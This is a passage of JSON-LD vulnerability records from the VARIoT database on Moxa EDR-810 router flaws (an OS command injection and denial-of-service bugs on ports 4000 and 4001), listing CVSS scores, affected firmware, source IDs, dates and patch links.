"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102612"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0473"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12121"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12121"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0473"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102612"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"date": "2018-05-14T20:29:00.267000",
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"date": "2022-12-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102612"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"date": "2022-12-14T15:43:08.887000",
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
],
"trust": 0.6
}
}
VAR-201805-0143
Vulnerability from variot - Updated: 2023-12-18 14:01Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability. Moxa EDR-810 Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0143",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14438"
}
]
},
"cve": "CVE-2017-14438",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14438",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11729",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105160",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14438",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14438",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14438",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11729",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-807",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105160",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability. Moxa EDR-810 Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0487",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-14438",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11729",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105160",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"id": "VAR-201805-0143",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
}
]
},
"last_update_date": "2023-12-18T14:01:17.594000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Denial of Service Vulnerability (CNVD-2018-11729)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132251"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190038"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0487"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14438"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14438"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0487"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"db": "VULHUB",
"id": "VHN-105160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105160"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"date": "2018-05-14T20:29:00.987000",
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11729"
},
{
"date": "2022-12-08T00:00:00",
"db": "VULHUB",
"id": "VHN-105160"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013417"
},
{
"date": "2022-12-08T03:55:51.717000",
"db": "NVD",
"id": "CVE-2017-14438"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013417"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-807"
}
],
"trust": 0.6
}
}
VAR-201805-0144
Vulnerability from variot - Updated: 2023-12-18 14:01Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4001/tcp to trigger this vulnerability. Moxa EDR-810 Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0144",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-806"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14439"
}
]
},
"cve": "CVE-2017-14439",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14439",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11728",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105161",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14439",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14439",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14439",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11728",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-806",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105161",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11728"
},
{
"db": "VULHUB",
"id": "VHN-105161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013418"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
"db": "NVD",
"id": "CVE-2017-14439"
},
{
